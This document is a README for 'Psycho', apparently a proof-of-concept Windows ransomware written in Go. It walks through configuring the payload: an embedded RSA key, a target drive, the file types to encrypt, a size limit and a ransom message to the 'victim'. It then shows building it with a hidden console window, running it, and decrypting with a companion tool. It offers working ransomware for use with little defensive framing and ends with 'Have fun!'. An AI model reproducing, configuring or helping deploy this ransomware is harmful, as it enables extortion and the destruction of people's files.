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Psycho PoC ransomware alt text
psycho is a PoC ransomware written in go

tested on windows 10


  • using hybrid encryption (witch is fast and safe)
  • customize settings
  • good appearance
  • changing background picture


to use:

clone the repository

git clone

change settings

go to Psycho/psycho/main.go and change the settings:

	/*** SETTINGS ***/
	//server rsa public key ( if you want to change this you should first generate a rsa keypair next replace it in both ransomware and decryptor programs )
	serverpubkey := "-----BEGIN PUBLIC KEY-----\nMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA3eWrYNmEzwLXGT0HUqqu\nkrimoiBKZE9mIzWvN51YLONneY0B8/yiLgJxg5pUOp8AEnu3gQm9uPQzbdyZniQq\n58HzSS+2Py17/UWlwqZVueUQ/RBvhH/BaEDZlKK7SUzeUqWbC0klDeLQ1nY48DEJ\nD2wNkz3CWXgDqQ0tfOqy+hRrR6ispOZc7k2SDd6cX8jkKzacH7sxBDYDVT2E/nYP\nkOBcCUW2ywN/y0FE1uqxim+axwtFW652k5ARHalmOVIXM6Oky6r4x49MN8zkIZEC\nhGDIOxQGYUEtp+0NhmAMyl26DtI23NMjyTaB7+DYtEZzSYgBllmfla1RtoEgKaHI\ns30PIUvZQGmg6VcEEhfy0hbtjDjWANkBrNewK46mH9pwH2wsYmm9QSftUjF62PbM\nLrFxoJS1w6NeYTC+s5JqGnG3sftCzGXMI+VSRvoVAWU+mm/ntQj5yww4nRq4Ylre\nJZAsLRUfT87c5uomolGitlGPIyXjxhxgPzc5egvQ199BAgMBAAE=\n-----END PUBLIC KEY-----"
	//root directory ( only files in this directory and subfolders of this directory will be encrypted )
	rootdir := "H:\\"
	//valid file extensions to encrypt ( only files with these extensions will be encrypted )
	validfileextensions := []string{"lnk" ,"pdf", "doc", "docx", "docm", "xlsx", "xlsm", "jpg", "jpeg", "png", "mp3", "mp4", "mkv", "py", "cs", "c", "cpp"}
	//valid file size to encrypt ( only files that have the same or less weight than this will be encrypted )
	//here is 400MB --> 1024 * 1024 * 400 = 419430400
	validfilesize := 419430400
	//the massage you want to show to the victim
	message := "Hi dear victim!\n"
	message += "Some of your files are encrypted now\n"
	message += "do not waste your time there is no way \nto get your files back except our decryption service"

create binary file

just go to Psycho/psycho directory and run:

go build -ldflags -H=windowsgui main.go

-ldflags -H=windowsgui options will hide the console window

run the file

just click on main.exe file
after some seconds desktop ppicture will change and a window like this will appear

alt text

and you can see that some of your files are encrypted

alt text

decrypting files

to decrypt files click on Get victimkey button. you will see a notepad window.

alt text

copy this text and go to Psycho/psychodecryptor and run:

go run decryptor.go <victim key here>

decryptor will give you a 32 character text like this:


now enter this text in Password textbox and click on Check password button. psycho will start to decrypt your files (it can take a while)
alt text

Now you got your files back

and you can also see tutorial video here:


Have fun!


Psycho PoC ransomware






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